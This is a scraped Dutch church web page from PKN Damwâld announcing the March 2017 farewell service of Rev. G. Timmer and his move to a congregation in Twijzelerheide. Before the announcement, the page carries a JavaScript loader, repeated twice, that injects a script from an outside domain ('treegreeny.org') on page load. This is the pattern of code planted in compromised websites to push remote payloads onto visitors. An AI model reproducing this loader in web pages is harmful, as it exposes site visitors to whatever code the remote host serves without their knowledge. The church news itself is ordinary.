;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Afscheid ds. G. Timmer - PKN Damwâld

Afscheid ds. G. Timmer

Gepubliceerd op: dinsdag 14 maart 2017

Na bijna 6 jaar verbonden te zijn geweest aan Hervormd Akkerwoude c.a. gaat ds. G. Timmer ons per 26 maart 2017 verlaten en zal hij officieel in zijn nieuwe gemeente in Twijzelerheide intrede doen als predikant.

Op zondag 26 maart 2017 zal om 09.30 uur de afscheidsdienst plaatsvinden in De Ikker.

Zondagmiddag 26 maart om 14.00 uur is de bevestigings- en intrededienst van ds. Timmer in de Hervormde Kerk aan de Smitswei 1 in Twijzelerheide. Ook daar bent u van harte welkom!

Wij bidden ds. Timmer en zijn gezin Gods onmisbare zegen toe bij de overstap naar en zijn werk in de Hervormde gemeente te Twijzelerheide. Dat hij met vrucht en vreugde in de gemeente van Twijzelerheide mag werken.